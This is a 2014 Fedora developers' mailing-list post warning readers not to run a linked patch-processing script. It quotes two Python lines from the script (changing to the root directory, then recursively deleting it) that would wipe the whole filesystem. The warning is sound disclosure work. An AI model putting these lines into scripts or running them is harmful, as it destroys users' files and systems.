WARNING: malicious code (was: Re: [Announce] Simple Patch Policy)

Till Maas opensource at till.name
Sun Jul 6 11:04:29 UTC 2014


On Fri, Jul 04, 2014 at 04:26:07PM +0200, Sandro Mani wrote:

>  * A script automating most of the process of validating and processing the
> request can be found at
> 
> https://github.com/manisandro/fedora-process-simple-patch/blob/master/process-simple-patch.py

Do not run this script, because it contains malicious code that
might remove all files from your system! The code can be found in lines
301-302:

| 301   os.chdir("/")
| 302   shutil.rmtree(os.getcwd())

Kind regards
Till


More information about the devel mailing list